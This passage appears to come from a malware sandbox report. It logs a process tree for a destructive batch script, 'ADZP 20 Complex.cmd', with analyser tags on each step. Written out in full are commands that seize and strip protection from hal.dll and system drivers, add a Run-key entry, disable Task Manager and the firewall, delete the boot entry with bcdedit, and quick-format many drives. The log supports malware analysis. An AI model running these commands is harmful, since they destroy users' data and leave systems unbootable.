      4⤵
      PID:7292
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:7392
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h *.*
      4⤵
      Views/modifies file attributes
      PID:7084
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:3688
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7912
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:6976
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8064
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:6808
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7696
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:6604
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:5692
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:5740
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7180
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:8088
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:4724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:7928
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:7688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:5164
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:3784
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\drivers" /r
      4⤵
      PID:7176
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\drivers" /reset /t /c /q
      4⤵
      PID:8448
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
      4⤵
      PID:8776
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:3412
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7992
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:3908
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7972
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8864
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:9264
  - - C:\Windows\system32\format.com
      format /y /q A:
      4⤵
      PID:9364
  - - C:\Windows\system32\format.com
      format /y /q B:
      4⤵
      PID:10776
  - - C:\Windows\system32\format.com
      format /y /q D:
      4⤵
      PID:11408
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:1820
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      PID:5156
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:5576
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:5716
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      PID:6092
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      PID:5416
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:5484
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:4532
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:5016
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:6320
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:6444
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:6564
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /delete {current}
      4⤵
      Modifies boot configuration data using bcdedit
      PID:7588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K Taskdl.bat
      4⤵
      PID:7728
  - - C:\Windows\system32\wscript.exe
      WScript Informacion.vbs
      4⤵
      PID:7768
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:7868
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h *.*
      4⤵
      PID:7284
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:7920
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7640
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:7184
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:3828
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:5440
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7224
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:4604
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7024
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:7064
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:5412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:8268
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:8284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:8320
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:8344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:8380
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:8416
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\drivers" /r
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:8512
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\drivers" /reset /t /c /q
      4⤵
      PID:8832
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
      4⤵
      PID:3884
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:9904
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:9960
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:10044
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:10128
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:10196
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:9200
  - - C:\Windows\system32\format.com
      format /y /q A:
      4⤵
      PID:9360
  - - C:\Windows\system32\format.com
      format /y /q B:
      4⤵
      PID:10568
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1976
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    PID:1628
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /reset /t /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:2324
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
    3⤵
    - Views/modifies file attributes
    PID:3096
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3288
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3304
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3312
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3320
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3344
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3356
- - C:\Windows\system32\format.com
    format /y /q A:
    3⤵
    PID:3428
- - C:\Windows\system32\format.com
    format /y /q B:
    3⤵
    PID:3836
- - C:\Windows\system32\format.com
    format /y /q D:
    3⤵
    PID:2960
- - C:\Windows\system32\format.com
    format /y /q E:
    3⤵
    PID:3664
- - C:\Windows\system32\format.com
    format /y /q F:
    3⤵
    PID:3756
- - C:\Windows\system32\format.com
    format /y /q G:
    3⤵
    PID:4156
- - C:\Windows\system32\format.com
    format /y /q H:
    3⤵
    PID:3748
- - C:\Windows\system32\format.com
    format /y /q I:
    3⤵
    PID:5228
- - C:\Windows\system32\format.com
    format /y /q J:
    3⤵
    PID:6068
- - C:\Windows\system32\format.com
    format /y /q K:
    3⤵
    PID:5744
- - C:\Windows\system32\format.com
    format /y /q L:
    3⤵
    PID:4292
- - C:\Windows\system32\format.com
    format /y /q M:
    3⤵
    PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:2348
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      PID:10724
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:10720
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:9968
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      PID:11556
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:5396
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      PID:9132
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:10888
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:11096
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Modifies file permissions
      PID:9432
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      PID:11796
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:12080
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:5480
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Modifies file permissions
      PID:10136
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:10792
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:10972
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      PID:10748
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      PID:11576
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:11900
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4456
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\VBICodec.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:5332
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\VBICodec.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:6344
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\VBICodec.ax"
    3⤵
    - Views/modifies file attributes
    PID:6572
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\vbisurf.ax"
    3⤵
    PID:7020
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\vbisurf.ax" /reset /c /q
    3⤵
    PID:7440
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\vbisurf.ax"
    3⤵
    - Views/modifies file attributes
    PID:8156
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\vidcap.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:7780
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\vidcap.ax" /reset /c /q
    3⤵
    PID:8068
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\vidcap.ax"
    3⤵
    - Views/modifies file attributes
    PID:10088
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\WSTPager.ax"
    3⤵
    - Modifies file permissions
    PID:11296
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
  2⤵
  PID:2696
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1720
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:2280
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    PID:1864
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\Twain_32.dll"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1968
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\Twain_32.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:1484
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\Twain_32.dll"
    3⤵
    PID:2784
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
    3⤵
    PID:2832
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:2148
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2704
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1980
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:2472
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    PID:1420
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Modifies file permissions
      PID:1072
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:2360
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:2668
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    PID:2296
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2292
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2272
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1696
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3004
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2384
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2148
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2892
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2328
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1780
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:2592
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Modifies file permissions
      PID:5328
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      PID:5844
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:5904
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Modifies file permissions
      PID:4292
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:5232
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:5780
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:4652
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:5188
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:6404
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:6536
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:6696
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /delete {current}
      4⤵
      Modifies boot configuration data using bcdedit
      PID:7920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K Taskdl.bat
      4⤵
      PID:8004
  - - C:\Windows\system32\wscript.exe
      WScript Informacion.vbs
      4⤵
      PID:8012
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:8088
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h *.*
      4⤵
      PID:6688
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:7420
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8336
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8408
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8460
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8496
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8556
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8596
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8652
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8688
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:8892
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:9032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:9084
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:9156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:9212
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:8240
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\drivers" /r
      4⤵
      PID:4140
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\drivers" /reset /t /c /q
      4⤵
      PID:9416
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
      4⤵
      Views/modifies file attributes
      PID:9676
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8000
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:9344
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:9516
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:9776
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:10332
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:10368
  - - C:\Windows\system32\format.com
      format /y /q A:
      4⤵
      PID:10500
  - - C:\Windows\system32\format.com
      format /y /q B:
      4⤵
      PID:904
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:2448
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4988
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      PID:4940
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:5180
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Modifies file permissions
      PID:5544
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      PID:5864
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:5920
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:5644
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:5228
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:2480
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:5784
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:6312
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /delete {current}
      4⤵
      Modifies boot configuration data using bcdedit
      PID:6932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K Taskdl.bat
      4⤵
      PID:6732
  - - C:\Windows\system32\wscript.exe
      WScript Informacion.vbs
      4⤵
      PID:6652
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:6300
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h *.*
      4⤵
      PID:7896
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:6612
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:1048
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:6716
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7724
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:7628
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7864
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:1728
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7448
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:6724
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:7940
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:5060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:2368
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:7880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:7392
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:7424
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\drivers" /r
      4⤵
      PID:1480
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\drivers" /reset /t /c /q
      4⤵
      Modifies file permissions
      PID:7400
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
      4⤵
      PID:6112
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8912
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:9056
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:9104
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:9180
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8220
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8256
  - - C:\Windows\system32\format.com
      format /y /q A:
      4⤵
      PID:8156
  - - C:\Windows\system32\format.com
      format /y /q B:
      4⤵
      PID:9244
  - - C:\Windows\system32\format.com
      format /y /q D:
      4⤵
      PID:10092
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:2792
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      PID:5656
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      PID:5960
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:6120
